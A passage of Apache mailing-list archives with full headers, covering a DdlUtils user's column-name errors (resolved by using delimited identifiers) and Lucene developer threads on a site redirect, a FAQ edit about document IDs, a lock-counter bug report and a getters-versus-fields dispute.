exception is wrapped into a DdlUtils exception. There more > interesting place would be where this original SQL exception happens. > Please also note that DdlUtils is untested with jTDS, so there may be > some issues with the JDBC metadata capabilities of jTDS that result in > problems with DdlUtils. > Could you run your tests with the Microsoft Sql Server 2005 driver to > see whether the error occurs there as well ? Hi Tom, Thanks for the swift response. Firstly, I've tracked down one of the exceptions that I was getting; there's a column in one of our tables named [Primary Buyer], and the brackets are being stripped out of the column name at some point, thus the word "Primary" shows up in the middle of the query. Great... :) Here's a stack trace from the other exception, using the MSSQL driver instead of Jtds: Exception in thread "main" org.apache.ddlutils.DynaSqlException: com.microsoft.sqlserver.jdbc.SQLServerException: Invalid column name 'Zip'. at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1706) at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1684) at com.mycompany.test.ddlutiltest.DdlUtilTest.main(DdlUtilTest.java:52) Caused by: com.microsoft.sqlserver.jdbc.SQLServerException: Invalid column name 'Zip'. at com.microsoft.sqlserver.jdbc.SQLServerException.makeFromDatabaseError(Unknown Source) at com.microsoft.sqlserver.jdbc.IOBuffer.processPackets(Unknown Source) at com.microsoft.sqlserver.jdbc.SQLServerStatement.getNextResult(Unknown Source) at com.microsoft.sqlserver.jdbc.SQLServerStatement.sendExecute(Unknown Source) at com.microsoft.sqlserver.jdbc.SQLServerStatement.doExecuteQuery(Unknown Source) at com.microsoft.sqlserver.jdbc.SQLServerStatement.executeQuery(Unknown Source) at org.apache.ddlutils.platform.JdbcModelReader.determineAutoIncrementFromResultSetMetaData(JdbcModelReader.java:1028) at org.apache.ddlutils.platform.mssql.MSSqlModelReader.readTable(MSSqlModelReader.java:102) at org.apache.ddlutils.platform.JdbcModelReader.readTables(JdbcModelReader.java:505) at org.apache.ddlutils.platform.JdbcModelReader.getDatabase(JdbcModelReader.java:468) at org.apache.ddlutils.platform.JdbcModelReader.getDatabase(JdbcModelReader.java:428) at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1699) Thanks, Shaun From [email protected] Fri Jun 23 16:45:10 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 74098 invoked from network); 23 Jun 2006 16:45:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 23 Jun 2006 16:45:10 -0000 Received: (qmail 63396 invoked by uid 500); 23 Jun 2006 16:45:10 -0000 Delivered-To: [email protected] Received: (qmail 63378 invoked by uid 500); 23 Jun 2006 16:45:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63367 invoked by uid 99); 23 Jun 2006 16:45:10 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 09:45:10 -0700 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mx.crye-leike.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 23 Jun 2006 09:45:09 -0700 Received: from mail.crye-leike.com (local.mail [161.129.204.104]) by mx.crye-leike.com (8.13.6/8.13.6) with ESMTP id k5NGitcc022532 for <[email protected]>; Fri, 23 Jun 2006 11:44:55 -0500 Received: from [161.129.204.104] (qh_7145 [161.129.204.104] (may be forged)) by mail.crye-leike.com (8.13.6/8.13.6) with ESMTP id k5NGimut017682 for <[email protected]>; Fri, 23 Jun 2006 11:44:48 -0500 Date: Fri, 23 Jun 2006 11:44:48 -0500 From: Shaun <[email protected]> To: [email protected] Subject: Re: Exceptions when using DdlUtils and Platform.readModelFromDatabase() In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Message-Id: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.24.02 [en] X-SA-Status: 2 X-Scanned-By: MIMEDefang 2.56 on 161.129.204.104 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On Fri, 23 Jun 2006 11:24:50 -0500 Shaun <[email protected]> wrote: > Exception in thread "main" org.apache.ddlutils.DynaSqlException: com.microsoft.sqlserver.jdbc.SQLServerException: Invalid column name 'Zip'. > at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1706) Actually, this boils down to the same problem as the other exception. The column name is [Zip Code], not Zip (threw me off because we do have tables with a column named Zip), and the brackets are being stripped there, too. Apologies to the list - it appears this was not a DdlUtils issue. Shaun From [email protected] Sat Jun 24 09:05:12 2006 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62412 invoked from network); 24 Jun 2006 09:05:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Jun 2006 09:05:12 -0000 Received: (qmail 12213 invoked by uid 500); 24 Jun 2006 09:05:12 -0000 Delivered-To: [email protected] Received: (qmail 12176 invoked by uid 500); 24 Jun 2006 09:05:11 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <ddlutils-user.db.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12165 invoked by uid 99); 24 Jun 2006 09:05:11 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 02:05:11 -0700 X-ASF-Spam-Status: No, hits=0.5 required=10.0 tests=DNS_FROM_RFC_ABUSE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO ug-out-1314.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 24 Jun 2006 02:05:11 -0700 Received: by ug-out-1314.google.com with SMTP id m3so210184uge for <[email protected]>; Sat, 24 Jun 2006 02:04:47 -0700 (PDT) DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=beta; d=gmail.com; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=S8CZIvHUrd0hXmSV+YxrJGgDdzEfasXMOt0HwLr47KiKb8oHDO/L+5jkRdSQWisegzkwfepa6D9MwBgxClHcKF0/MMlepOKGVlJt0snOS5HhAhKLViFmMy9Zap7LJAQubQiE3aNHROV1c+ssCQuHagVLlo/7wuXicoTDzQU4unw= Received: by 161.129.204.104 with SMTP id g12mr3102263ugj; Sat, 24 Jun 2006 02:04:47 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Sat, 24 Jun 2006 02:04:47 -0700 (PDT) Message-ID: <[email protected]> Date: Sat, 24 Jun 2006 11:04:47 +0200 From: "Thomas Dudziak" <[email protected]> To: [email protected] Subject: Re: Exceptions when using DdlUtils and Platform.readModelFromDatabase() In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <[email protected]> <[email protected]> <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N On 6/23/06, Shaun <[email protected]> wrote: > On Fri, 23 Jun 2006 11:24:50 -0500 > Shaun <[email protected]> wrote: > > > Exception in thread "main" org.apache.ddlutils.DynaSqlException: com.microsoft.sqlserver.jdbc.SQLServerException: Invalid column name 'Zip'. > > at org.apache.ddlutils.platform.PlatformImplBase.readModelFromDatabase(PlatformImplBase.java:1706) > > Actually, this boils down to the same problem as the other exception. > The column name is [Zip Code], not Zip (threw me off because we do have > tables with a column named Zip), and the brackets are being stripped > there, too. > > Apologies to the list - it appears this was not a DdlUtils issue. Actually, your database uses delimited identifiers (http://msdn2.microsoft.com/en-us/library/ms176027.aspx). So, in order to properly read the database with DdlUtils, you must turn on delimited identifiers support via the corresponding useDelimitedSqlIdentifiers attribute of the Ant task (http://db.apache.org/ddlutils/ant-tasks.html#DdlToDatabaseTask+reference). Tom
From [email protected] Tue Mar 01 17:50:59 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 71850 invoked from network); 1 Mar 2005 17:50:59 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Mar 2005 17:50:59 -0000 Received: (qmail 75624 invoked by uid 500); 1 Mar 2005 17:50:57 -0000 Delivered-To: [email protected] Received: (qmail 75597 invoked by uid 500); 1 Mar 2005 17:50:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Lucene Developers List" <lucene-dev.jakarta.apache.org> Reply-To: "Lucene Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 75583 invoked by uid 99); 1 Mar 2005 17:50:57 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from rwcrmhc13.comcast.net (HELO rwcrmhc13.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 01 Mar 2005 09:50:55 -0800 Received: from [161.129.204.104] (c-24-5-160-217.client.comcast.net[161.129.204.104]) by comcast.net (rwcrmhc13) with ESMTP id <2005030117505401500l3keqe>; Tue, 1 Mar 2005 17:50:54 +0000 Message-ID: <[email protected]> Date: Tue, 01 Mar 2005 09:50:52 -0800 From: Doug Cutting <[email protected]> User-Agent: Mozilla Thunderbird 0.9 (X11/20041127) X-Accept-Language: en-us, en MIME-Version: 1.0 To: Lucene Developers List <[email protected]> Subject: Re: updating jakarta site References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Henri Yandell wrote: >>Redirect of jakarta.apache.org/lucene to lucene.apache.org/java/docs/index.html > > I noticed there's a commented out redirect in the .htaccess, so after > adding my own I deleted it again and left the redirect off for the > moment. Unsure if there's a reason the commented out bit is there and > lucene.apache.org/java and jakarta.apache.org/lucene look to be clones > currently (barring the extra news [email protected]). When the redirect was first put into place there were some broken links at lucene.apache.org/java, so the redirect be removed until the links were fixed. I think the links were fixed but the redirect was never restored. Doug --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 01 19:43:48 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40966 invoked from network); 1 Mar 2005 19:43:48 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Mar 2005 19:43:48 -0000 Received: (qmail 67898 invoked by uid 500); 1 Mar 2005 19:43:47 -0000 Delivered-To: [email protected] Received: (qmail 67535 invoked by uid 500); 1 Mar 2005 19:43:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Lucene Developers List" <lucene-dev.jakarta.apache.org> Reply-To: "Lucene Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 67517 invoked by uid 99); 1 Mar 2005 19:43:46 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 01 Mar 2005 11:43:45 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id 4D52013E2135; Tue, 1 Mar 2005 14:43:41 -0500 (EST) Received: from [161.129.204.104] (d-128-167-124.bootp.Virginia.EDU [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id CD69313E2134 for <[email protected]>; Tue, 1 Mar 2005 14:43:39 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: updating jakarta site Date: Tue, 1 Mar 2005 14:43:35 -0500 To: "Lucene Developers List" <[email protected]> X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-3.3 required=5.0 tests=AWL,BAYES_00 autolearn=ham version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N On Mar 1, 2005, at 12:50 PM, Doug Cutting wrote: > Henri Yandell wrote: >>> Redirect of jakarta.apache.org/lucene to >>> lucene.apache.org/java/docs/index.html >> I noticed there's a commented out redirect in the .htaccess, so after >> adding my own I deleted it again and left the redirect off for the >> moment. Unsure if there's a reason the commented out bit is there and >> lucene.apache.org/java and jakarta.apache.org/lucene look to be clones >> currently (barring the extra news [email protected]). > > When the redirect was first put into place there were some broken > [email protected]/java, so the redirect be removed until the > links were fixed. I think the links were fixed but the redirect was > never restored. I put in the original redirect and later commented it out. There was also an issue with DNS of lucene.apache.org, which has been cleared up. If there are still issues with the lucene.apache.org/java site, let me know and I'll try to fix it, but it should be mostly fine. When Doug is cool with re-enabling the redirect, it's fine with me. Erik --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 01 20:14:31 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59765 invoked from network); 1 Mar 2005 20:14:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Mar 2005 20:14:31 -0000 Received: (qmail 31098 invoked by uid 500); 1 Mar 2005 20:14:30 -0000 Delivered-To: [email protected] Received: (qmail 30653 invoked by uid 500); 1 Mar 2005 20:14:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Lucene Developers List" <lucene-dev.jakarta.apache.org> Reply-To: "Lucene Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 30639 invoked by uid 500); 1 Mar 2005 20:14:29 -0000 Received: (qmail 30636 invoked by uid 99); 1 Mar 2005 20:14:29 -0000 X-ASF-Spam-Status: No, hits=-9.8 required=10.0 tests=ALL_TRUSTED,NO_REAL_NAME X-Spam-Check-By: apache.org Received: from minotaur.apache.org (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with SMTP; Tue, 01 Mar 2005 12:14:26 -0800 Received: (qmail 59703 invoked from network); 1 Mar 2005 20:14:25 -0000 Received: from localhost.hyperreal.org (HELO minotaur.apache.org) (161.129.204.104) by localhost.hyperreal.org with SMTP; 1 Mar 2005 20:14:25 -0000 Content-Type: text/plain; charset="iso-8859-1" MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable From: [email protected] To: [email protected] Subject: =?iso-8859-1?q?=5BJakarta_Lucene_Wiki=5D_Updated=3A__LuceneFAQ?= Date: Tue, 01 Mar 2005 20:14:25 -0000 Message-ID: <[email protected]> X-Spam-Rating: localhost.hyperreal.org 1.6.2 0/1000/N X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Date: 2005-03-01T12:14:25 Editor: HossMan Wiki: Jakarta Lucene Wiki Page: LuceneFAQ URL: http://wiki.apache.org/jakarta-lucene/LuceneFAQ from doug, lucene-users, "Tue, 01 Mar 2005 10:19:05 -0800" Change Log: ---------------------------------------------------------------------------= --- @@ -406,9 +406,11 @@ Yes, `IndexWriter.addIndexes(Directory[])` method is thread safe. It is a= `final synchronized` method. = = -=3D=3D=3D=3D Do document IDs change after merging indices or after documen= t deletion? =3D=3D=3D=3D +=3D=3D=3D=3D When is it possible for document IDs to change? =3D=3D=3D=3D = -Yes, document IDs do change. +Documents are only re-numbered after there have been deletions. Once ther= e have been deletions, renumbering may be triggered by any document additio= n or index optimization. Once an index is optimized, no renumbering will b= e performed unril more deletions are made. + +If you require a persistent document id that survives deletions, then add = it as a field to your documents. = = =3D=3D=3D=3D What is the purpose of write.lock file, when is it used, and = by which classes? =3D=3D=3D=3D --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 01 21:39:09 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37613 invoked from network); 1 Mar 2005 21:39:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Mar 2005 21:39:08 -0000 Received: (qmail 85653 invoked by uid 500); 1 Mar 2005 21:39:06 -0000 Delivered-To: [email protected] Received: (qmail 85625 invoked by uid 500); 1 Mar 2005 21:39:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Lucene Developers List" <lucene-dev.jakarta.apache.org> Reply-To: "Lucene Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 85611 invoked by uid 99); 1 Mar 2005 21:39:06 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 01 Mar 2005 13:39:05 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j21Ld3Qj004678 for <[email protected]>; Tue, 1 Mar 2005 22:39:03 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j21Ld33S004675; Tue, 1 Mar 2005 22:39:03 +0100 Date: Tue, 1 Mar 2005 22:39:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33799] New: - Locking bug X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33799>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33799 Summary: Locking bug Product: Lucene Version: 1.4 Platform: All OS/Version: All Status: NEW Severity: normal Priority: P2 Component: Other AssignedTo: [email protected] ReportedBy: [email protected] CC: [email protected] In org.apache.lucene.store.Lock, line 57 (lucene_1_4_final branch): if (++sleepCount == maxSleepCount) is incorrect, the sleepCount is incremented before the compare causing it throwing the exception with out waiting for at least 1 interation. Should be changed instead to: if (sleepCount++ == maxSleepCount) As this is a self-contained simple fix, I am not submitting a patch. Thanks -John -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Mar 01 22:57:56 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72839 invoked from network); 1 Mar 2005 22:57:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 1 Mar 2005 22:57:56 -0000 Received: (qmail 25762 invoked by uid 500); 1 Mar 2005 22:57:54 -0000 Delivered-To: [email protected] Received: (qmail 25731 invoked by uid 500); 1 Mar 2005 22:57:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Lucene Developers List" <lucene-dev.jakarta.apache.org> Reply-To: "Lucene Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 25714 invoked by uid 99); 1 Mar 2005 22:57:53 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from rwcrmhc13.comcast.net (HELO rwcrmhc13.comcast.net) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 01 Mar 2005 14:57:52 -0800 Received: from [161.129.204.104] (c-24-5-160-217.client.comcast.net[161.129.204.104]) by comcast.net (rwcrmhc13) with ESMTP id <2005030122575001500l76h7e>; Tue, 1 Mar 2005 22:57:50 +0000 Message-ID: <[email protected]> Date: Tue, 01 Mar 2005 14:57:49 -0800 From: Doug Cutting <[email protected]> User-Agent: Mozilla Thunderbird 0.9 (X11/20041127) X-Accept-Language: en-us, en MIME-Version: 1.0 To: Lucene Developers List <[email protected]> Subject: Re: updating jakarta site References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Erik Hatcher wrote: > When Doug is cool with re-enabling the redirect, it's fine with me. I'm cool with it if it works. Why not re-enable it, search for "site:apache.org lucene" on Google, Yahoo! and MSN, and click on the first few links. If these work, then I'm okay with the redirect. As we change stuff like this, we should try to change things only once, rather than a temporary change that might not be appropriate long-term. This is especially the case with things like URLs & email addresses, that get saved in mail archives, web indexes, etc. The fewer times we change them the less we'll break things. Thankfully "jakarta" never made it into a package name! Doug --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 02 03:19:24 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88314 invoked from network); 2 Mar 2005 03:19:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Mar 2005 03:19:24 -0000 Received: (qmail 90826 invoked by uid 500); 2 Mar 2005 03:19:21 -0000 Delivered-To: [email protected] Received: (qmail 90796 invoked by uid 500); 2 Mar 2005 03:19:21 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Lucene Developers List" <lucene-dev.jakarta.apache.org> Reply-To: "Lucene Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 90781 invoked by uid 99); 2 Mar 2005 03:19:21 -0000 X-ASF-Spam-Status: No, hits=0.1 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from zrnetservice.com (HELO wifi.zrnetservice.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 01 Mar 2005 19:19:19 -0800 Received: from adsl-67-114-20-29.dsl.pltn13.pacbell.net ([161.129.204.104] helo=zrnet-Cole_Valley_Cafe.zrnetservice.com) by wifi.zrnetservice.com with asmtp (Exim 3.36 #1 (Debian)) id 1D6KOI-0004ws-00 for <[email protected]>; Tue, 01 Mar 2005 19:19:15 -0800 Received: from [161.129.204.104] (helo=[161.129.204.104]) by zrnet-Cole_Valley_Cafe.zrnetservice.com with esmtp (Exim 4.34 #1 (Debian)) id 1D6KOB-0000oG-Jg for <[email protected]>; Tue, 01 Mar 2005 19:19:07 -0800 Message-ID: <[email protected]> Date: Tue, 01 Mar 2005 19:19:07 -0800 From: "Kevin A. Burton" <[email protected]> User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040616 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Lucene Developers List <[email protected]> Subject: Re: patch - DEFAULT_ vars in IndexWriter non-final and DEFAULT for useCompoundFile References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Doug Cutting wrote: > > This isn't a coding convention, but rather software engineering. If > we wish to be able to back-compatibly modify Lucene's implementation > at a later date, its usually easiest to have access through methods > rather than fields, since we can intecept reads and writes to the field. > Standard accessor/mutator stuff... but how often is it used? Rarely if ever... The point being there are a lot of benefits to just make it non-final. I sent an email to commons-dev about this. I should probably just blog about it so I can give you a permalink :) Kevin -- Use Rojo (RSS/Atom aggregator). Visit http://rojo.com. Ask me for an invite! Also see irc.freenode.net #rojo if you want to chat. Rojo is Hiring! - http://www.rojonetworks.com/JobsAtRojo.html If you're interested in RSS, Weblogs, Social Networking, etc... then you should work for Rojo! If you recommend someone and we hire them you'll get a free iPod! Kevin A. Burton, Location - San Francisco, CA AIM/YIM - sfburtonator, Web - http://peerfear.org/ GPG fingerprint: 5FB2 F3E2 760E 70A8 6174 D393 E84D 8D04 99F1 4412 --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 02 05:13:39 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49854 invoked from network); 2 Mar 2005 05:13:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Mar 2005 05:13:39 -0000 Received: (qmail 51782 invoked by uid 500); 2 Mar 2005 05:13:34 -0000 Delivered-To: [email protected] Received: (qmail 51674 invoked by uid 500); 2 Mar 2005 05:13:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Lucene Developers List" <lucene-dev.jakarta.apache.org> Reply-To: "Lucene Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 51627 invoked by uid 99); 2 Mar 2005 05:13:33 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 01 Mar 2005 21:13:30 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id 9448213E210E; Wed, 2 Mar 2005 00:13:25 -0500 (EST) Received: from [161.129.204.104] (va-chrvlle-cad1-bdgrp1-4b-b-169.chvlva.adelphia.net [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id 4068D13E2006 for <[email protected]>; Wed, 2 Mar 2005 00:12:59 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: patch - DEFAULT_ vars in IndexWriter non-final and DEFAULT for useCompoundFile Date: Wed, 2 Mar 2005 00:12:54 -0500 To: "Lucene Developers List" <[email protected]> X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-1.3 required=5.0 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Kevin, Why bother arguing such petty stuff? getters/setters, as awkward and verbose as they may be, is how its done in Java land. There is no benefit to making it non-final over using getters/setters. The LOC argument is silly too - we're not counting LOC or anything. Let's keep focused on Lucene's core purpose and improvement. Erik On Mar 1, 2005, at 10:19 PM, Kevin A. Burton wrote: > Doug Cutting wrote: > >> >> This isn't a coding convention, but rather software engineering. If >> we wish to be able to back-compatibly modify Lucene's implementation >> at a later date, its usually easiest to have access through methods >> rather than fields, since we can intecept reads and writes to the >> field. >> > Standard accessor/mutator stuff... but how often is it used? Rarely > if ever... The point being there are a lot of benefits to just make it > non-final. I sent an email to commons-dev about this. I should > probably just blog about it so I can give you a permalink :) > > Kevin > > -- > > Use Rojo (RSS/Atom aggregator). Visit http://rojo.com. Ask me for an > invite! Also see irc.freenode.net #rojo if you want to chat. > > Rojo is Hiring! - http://www.rojonetworks.com/JobsAtRojo.html > > If you're interested in RSS, Weblogs, Social Networking, etc... then > you should work for Rojo! If you recommend someone and we hire them > you'll get a free iPod! > Kevin A. Burton, Location - San Francisco, CA > AIM/YIM - sfburtonator, Web - 